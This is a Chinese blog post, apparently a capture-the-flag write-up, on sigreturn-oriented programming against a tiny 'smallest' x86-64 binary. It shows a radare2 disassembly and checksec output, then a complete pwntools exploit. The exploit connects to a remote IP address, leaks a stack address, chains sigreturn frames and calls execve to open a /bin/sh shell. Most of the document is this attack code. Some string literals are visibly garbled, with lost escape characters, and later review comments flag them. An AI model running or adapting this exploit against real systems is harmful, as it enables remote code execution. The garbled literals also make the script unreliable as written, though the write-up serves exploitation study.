• SROP的一个实例


    以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便

    junmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest                                                                             00:54:15
    Warning: Cannot initialize dynamic strings
    [x] Analyze all flags starting with sym. and entry0 (aa)
    [x] Analyze len bytes of instructions for references (aar)
    [x] Analyze function calls (aac)
    [ ] [*] Use -AA or aaaa to perform additional experimental analysis.
    [x] Constructing a function name for fcn.* and sym.func.* functions (aan))
    0x004000b0
    
     -- WASTED
    [0x004000b0]> afl
    0x004000b0    1 17           entry0
    [0x004000b0]> pdf entry0
                ;-- section..text:
    / (fcn) entry0 17
    |   entry0 ();
    |           0x004000b0      4831c0         xor rax, rax                ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text
    |           0x004000b3      ba00040000     mov edx, 0x400              ; 1024
    |           0x004000b8      4889e6         mov rsi, rsp
    |           0x004000bb      4889c7         mov rdi, rax
    |           0x004000be      0f05           syscall
               0x004000c0      c3             ret
    [0x004000b0]>
    

    源码就这么几行,

    junmoxiao@cat ~/s/pd_ubuntu> file smallest                                                                              00:54:06
    smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
    junmoxiao@cat ~/s/pd_ubuntu> checksec smallest                                                                          00:54:12
    [*] '/Users/junmoxiao/share/pd_ubuntu/smallest'
        Arch:     amd64-64-little
        RELRO:    No RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)
    junmoxiao@cat ~/s/pd_ubuntu>
    

    最后的exp

    #coding:utf-8
    # Exploit script from the write-up above, for the 17-byte "smallest" binary.
    # The whole program is entry0 (see the r2 listing): one syscall whose number
    # is whatever rax holds at that point, with rsi = rsp and rdi = rax, followed
    # by `ret` into whatever the read() placed on the stack.  checksec reports
    # "No PIE (0x400000)", which is why the fixed 0x4000xx addresses below work.
    # This is Python 2 code (print statements, str(frame) on the pwntools frame).
    from pwn import *
    import time
    
    file_name = './smallest'
    context.binary = file_name
    elf = ELF(file_name)
    #context.log_level = 'debug'
    
    # Address of the `syscall` instruction inside entry0 (0x4000be in the listing).
    syscall_addr = 0x4000be
    
    #p = process(file_name)
    p = remote('106.75.93.227', 20000)
    #p = remote('106.75.61.55',  20000)
    #gdb.attach(p, 'aslr on;b * 0x4000b0')
    
    # ---------------------------------------------------------------------------------
    # Stage 1: three return addresses into entry0.  0x4000b0 is the function start
    # (xor rax,rax -> syscall 0, i.e. read); 0x4000b3 skips the xor, so rax keeps
    # the previous read()'s return value and that value becomes the next syscall number.
    log.info('call read; call write; call read')
    
    payload = p64(0x4000b0)
    payload += p64(0x4000b3)
    payload += p64(0x4000b0)
    
    
    p.sendline(payload)   # sendline appends '\n', so one byte more than the 24-byte chain is read
    
    time.sleep(3)
    # NOTE(review): this literal looks extraction-garbled (a `\x` escape lost); as written it
    # sends 3 bytes.  Per the log line above, the write-up relies on the length of this short
    # read ending up in rax -- confirm against the original post before reading further.
    p.send('xb3')
    
    # -------------------------------------------------------------------------------------
    # Stage 2: the write syscall sends back 0x400 bytes from the stack (edx = 0x400 in
    # entry0); the qword at offset 8 of that dump is taken as the stack-address leak.
    # set eax; sigreturn; 
    leak_data = p.recvn(0x400)
    
    leak_addr = u64(leak_data[0x8:0x8+8])
    print "leak_addr: %s" % hex(leak_addr)
    
    
    # The offsets below are specific to this challenge's stack layout.
    stack_addr = leak_addr - 0x1000
    print 'stack_start_addr %s' % hex(stack_addr)
    
    binsh_addr = stack_addr + 0x300   # must match the 0x300 padding length in the final payload
    print 'binsh_addr: %s' % hex(binsh_addr)
    log.info('stack pivot to %s' % hex(stack_addr))
    
    # Sigreturn frame describing read(0, stack_addr, 0x500) with rsp moved to stack_addr,
    # so the next payload lands at an address this script already knows.
    frame = SigreturnFrame()
    frame.rax = constants.SYS_read
    frame.rdi = 0
    frame.rsi = stack_addr
    frame.rdx = 0x500
    frame.rsp = stack_addr
    frame.rip = syscall_addr
    
    # Return into entry0 once more (a read), then into the raw syscall with the frame behind it.
    payload =  p64(0x4000b0) + p64(syscall_addr)
    payload += str(frame)
    p.sendline(payload)
    
    time.sleep(10)
    # Re-send exactly 15 bytes: that read() returns 15, entry0 leaves it in rax, and the
    # following syscall is therefore rt_sigreturn (what the author's comment calls "sigreturn").
    p.send(payload[8:8+15]) # set eax=sigreturn
    
    time.sleep(5)
    log.info('execve')
    # Second frame: execve(binsh_addr, 0, 0) via the same syscall gadget.
    frame = SigreturnFrame()
    frame.rax = constants.SYS_execve
    frame.rdi = binsh_addr
    frame.rsi = 0
    frame.rdx = 0
    frame.rsp = 0x400300   # NOTE(review): a fixed address in the no-PIE image region, not the leaked stack -- confirm intent
    frame.rip = syscall_addr
    payload =  p64(0x4000b0) + p64(syscall_addr)
    payload += str(frame)
    # Pad to 0x300 so the shell string sits at binsh_addr (= stack_addr + 0x300).
    # NOTE(review): the trailing literal also looks like a lost `\x` escape -- verify against the original post.
    payload += 'a' * (0x300-len(payload)) + '/bin/shx00'
    
    p.sendline(payload)
    time.sleep(5)
    # Same 15-byte trick as above to turn the pending syscall into rt_sigreturn.
    p.send(payload[8:8+15]) # set eax=sigreturn
    
    
    p.interactive()
    
  • 原文地址:https://www.cnblogs.com/junmoxiao/p/6741642.html